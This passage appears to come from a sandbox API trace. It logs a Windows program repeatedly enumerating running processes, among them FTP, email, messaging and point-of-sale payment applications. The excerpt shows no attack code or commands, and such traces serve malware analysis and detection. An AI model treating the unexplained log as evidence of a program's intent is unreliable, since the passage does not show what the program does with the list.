hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0152.445] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0152.447] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0152.450] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0152.452] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0152.455] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0152.458] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0152.496] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0152.499] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0152.502] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0152.504] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0152.507] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0152.511] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0152.513] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0152.516] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0152.519] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0152.522] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0152.525] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0152.528] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0152.533] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0152.542] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0152.544] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0152.547] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0152.549] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0152.552] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0152.555] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0152.558] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0152.560] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0152.562] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0152.565] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0152.567] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0152.570] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0152.572] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0152.574] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0152.579] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0152.581] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0152.583] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0152.585] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0152.588] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0152.591] CloseHandle (hObject=0x1fcc) returned 1 [0152.591] Sleep (dwMilliseconds=0x64) [0152.716] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a50 [0152.729] Process32First (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.732] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0152.734] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0152.736] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.737] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0152.739] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.741] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0152.743] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0152.744] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0152.746] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.747] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.749] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0152.750] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.752] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.971] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.973] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.976] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.978] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.980] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.982] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0152.985] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0152.987] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0152.989] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0152.991] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.993] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0152.995] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0152.998] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0153.000] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0153.002] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0153.004] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0153.043] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.045] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0153.047] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0153.050] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0153.052] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0153.054] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.058] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0153.060] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0153.062] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0153.063] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0153.064] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0153.066] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0153.067] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0153.069] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0153.071] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, 